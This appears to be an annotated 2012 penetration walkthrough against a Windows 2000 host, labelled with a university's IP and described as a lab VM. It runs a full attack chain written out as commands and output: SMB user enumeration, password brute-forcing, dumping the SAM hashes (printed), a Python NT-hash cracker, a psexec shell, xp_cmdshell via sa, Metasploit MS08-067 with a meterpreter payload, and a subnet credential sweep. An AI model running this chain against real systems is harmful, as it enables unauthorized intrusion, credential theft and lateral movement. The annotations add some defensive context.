Guangxi Normal (广西师范) website http://202.103.242.241/
(The MAC vendor nmap reports below, Cadmus Computer Systems, is the VirtualBox OUI 08:00:27, so the box being scanned is a lab VM rather than the live site.)

root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc         Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds

Version detection pins the host to Windows 2000 (the microsoft-ds banner on 445/tcp) with RDP (3389/tcp) and the RPC endpoint mapper (135/tcp) exposed. Everything that follows goes through SMB on 139/445.
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb   // list the SMB NSE scripts that ship with this nmap
-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root  1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241
// use the script to enumerate the account names that exist on the remote machine

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
|_ Domain: PG-F289F9A8EF3E; Users: Administrator, Guest, test, TsInternetUser   // scan result

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds

No credentials were passed to the script, so the user list came back over an anonymous (null) session. That alone tells you the host allows anonymous SAM enumeration, which is what makes the password attack below cheap: the attacker already has the exact account names.
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241
// list the shares

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds

Only the administrative shares exist. Anonymous READ on IPC$ is the null session that the user enumeration above rode on; ADMIN$ and C$ need real credentials, which is the next step.

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241
// brute-force the account passwords

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds

Two hits with nothing but the default wordlists: the built-in Administrator has an empty password and test uses 123456. Windows 2000 has no "limit blank-password accounts to console logon" policy (that setting arrived with Windows XP), so the empty Administrator password is usable over the network exactly as shown here.
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2   // fetch pwdump6 to dump the password hashes
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-pwdump:
|   Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
|   Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
|   test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_  TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds

Notes on this step: smb-pwdump.nse is pulled from the nmap-exp dev tree, not from the release scripts directory, and the pwdump6 binaries are unpacked under nselib/data where the script expects them; dumping the SAM needs an account with administrative rights on the target, which test evidently has. Each result line is account:RID => LM hash:NT hash. "NO PASSWORD" is pwdump6's way of printing the empty-password hashes, confirming the blank Administrator password found by smb-brute. For test, the LM/NT pair is exactly the pair for 123456, and the second half of the LM hash (AAD3B435B51404EE) is the hash of an empty 7-byte half, which by itself tells an attacker the password is at most 7 characters. The TsInternetUser hash is not cracked here, but it does not need to be: an LM:NT pair is sufficient to authenticate over SMB (pass-the-hash), which is what the subnet sweep at the end of the post attempts.
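To make the dump above actionable offline, here is an added example (my code, not the author's and not part of nmap or pwdump6) that parses smb-pwdump lines, flags what each LM/NT pair reveals, and checks the NT hashes against a small wordlist. SAMPLE is constructed from the output shown on this page; the wordlist and the pure-Python MD4 (included so the script does not depend on hashlib exposing MD4, which OpenSSL 3 builds often do not) are my own.

```python
"""Triage of smb-pwdump / pwdump6 output (added example, not code from
the original post, nmap or pwdump6). SAMPLE is constructed from the page's
output; WORDLIST is an assumed stand-in for a real dictionary."""
import re
import struct

# Well-known constants: LM hash of an empty 7-byte half, and NT hash of "".
LM_EMPTY_HALF = "AAD3B435B51404EE"
NT_EMPTY = "31D6CFE0D16AE931B73C59D7E0C089C0"

SAMPLE = """\
| smb-pwdump:
|   Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
|   Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
|   test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_  TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
"""
WORDLIST = ["password", "123456", "admin", "test"]  # assumption, not a real list


def _rotl(x, n):
    x &= 0xFFFFFFFF
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4: pad, then three 16-step rounds per 64-byte block."""
    bits = len(data) * 8
    data += b"\x80" + b"\x00" * ((55 - len(data) % 64) % 64) + struct.pack("<Q", bits)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    r2 = [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]
    r3 = [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]
    for off in range(0, len(data), 64):
        x = struct.unpack("<16I", data[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(16):  # round 1, F = (b & c) | (~b & d)
            a = _rotl(a + ((b & c) | (~b & d)) + x[i], (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 2, G = majority(b, c, d)
            a = _rotl(a + ((b & c) | (b & d) | (c & d)) + x[r2[i]] + 0x5A827999, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 3, H = b ^ c ^ d
            a = _rotl(a + (b ^ c ^ d) + x[r3[i]] + 0x6ED9EBA1, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a, b, c, d = (a + aa) & 0xFFFFFFFF, (b + bb) & 0xFFFFFFFF, (c + cc) & 0xFFFFFFFF, (d + dd) & 0xFFFFFFFF
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> str:
    """NT hash = MD4(UTF-16LE(password)), upper-case hex as pwdump prints it."""
    return md4(password.encode("utf-16-le")).hex().upper()


LINE_RE = re.compile(r"^\|_?\s*(?P<user>[^:]+):(?P<rid>\d+) => (?P<lm>[^:]+):(?P<nt>.+)$")


def parse_pwdump(text):
    """Map account -> (rid, lm, nt); 'NO PASSWORD***' becomes the empty-password hashes."""
    accounts = {}
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        lm, nt = m.group("lm").strip().upper(), m.group("nt").strip().upper()
        if lm.startswith("NO PASSWORD"):
            lm = LM_EMPTY_HALF * 2
        if nt.startswith("NO PASSWORD"):
            nt = NT_EMPTY
        accounts[m.group("user")] = (int(m.group("rid")), lm, nt)
    return accounts


def triage(accounts, wordlist):
    """Flag empty passwords, stored LM hashes, <=7-char passwords, and cracked NT hashes."""
    lookup = {nt_hash(w): w for w in wordlist}
    findings = {}
    for user, (_rid, lm, nt) in accounts.items():
        notes = []
        if nt == NT_EMPTY:
            notes.append("empty password")
        else:
            if lm != LM_EMPTY_HALF * 2:
                notes.append("LM hash stored")  # case-insensitive, crackable in two halves
            if lm[16:] == LM_EMPTY_HALF:
                notes.append("password is 7 chars or shorter")
            if nt in lookup:
                notes.append("NT hash cracked: " + lookup[nt])
        findings[user] = notes
    return findings


if __name__ == "__main__":
    for user, notes in triage(parse_pwdump(SAMPLE), WORDLIST).items():
        print(f"{user:16} {', '.join(notes) or 'nothing flagged'}")
```

Run it as-is and it reports Administrator and Guest as empty, test as "LM hash stored, password is 7 chars or shorter, NT hash cracked: 123456", and TsInternetUser as LM-stored but uncracked. The useful design point is that the LM half check costs nothing and narrows the search space before any cracking starts; for real dumps, feed the NT column to a proper cracker and use this only for triage.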
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe   // get a cmd shell
(桌面 is the Desktop folder on a Chinese-locale Windows.)

PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter Local Area Connection:

        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 202.103.242.241
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 202.103.1.1

PsExec copies its service binary to ADMIN$ and registers a service over the service control manager, so this working with test:123456 means test holds local administrator rights on the target, consistent with the hash dump having succeeded with the same account.

C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user'"   // log in remotely as sa and run a command through xp_cmdshell

This tries the password recovered for test (123456) against the SQL Server sa account. Note that the port scan at the top shows no 1433/tcp, so this step presupposes a SQL Server instance the default scan did not reveal; on a real engagement you would confirm the listener (and whether xp_cmdshell is enabled) before relying on it.
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241   // check the target for known SMB vulnerabilities

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-check-vulns:
|_  MS08-067: VULNERABLE

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds

smb-check-vulns runs active checks against the service rather than inferring from version strings, and some of its checks are gated behind the script's unsafe argument because they can crash an unpatched host. Read the script documentation before pointing it at anything that is not a lab VM.
root@bt:~# msfconsole   // exploit MS08-067 against the target from msf
msf > search ms08*
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf exploit(ms08_067_netapi) > show payloads
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > exploit
meterpreter >
Background session 2? [y/N] (ctrl+z)
msf exploit(ms08_067_netapi) > sessions -l

The bind_tcp payload makes the target listen and has msf connect to it, which works here because the attacker can reach the VM directly; against a host behind a firewall or NAT you would use a reverse payload and set LHOST instead. Session 2 is the meterpreter that was just backgrounded with ctrl+z; sessions -l lists it.
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
administrator
root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
// use the usernames and the captured hash to try logging into every host on the internal /24

Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful

The attack succeeded: a simple nmap + msf attack chain.

One caveat on the last step: the only hit reported is administrator with a blank password, which smb-brute tries on its own; nothing in the output shows the LM hash in password.txt being accepted. What the sweep actually demonstrates is credential reuse across hosts (the same blank Administrator password on 192.168.1.105 as on the original target), and that is the finding to write up. An attacker with the dumped LM:NT pairs can still pass them directly over SMB, which is why an uncracked hash dump is already a lateral-movement problem.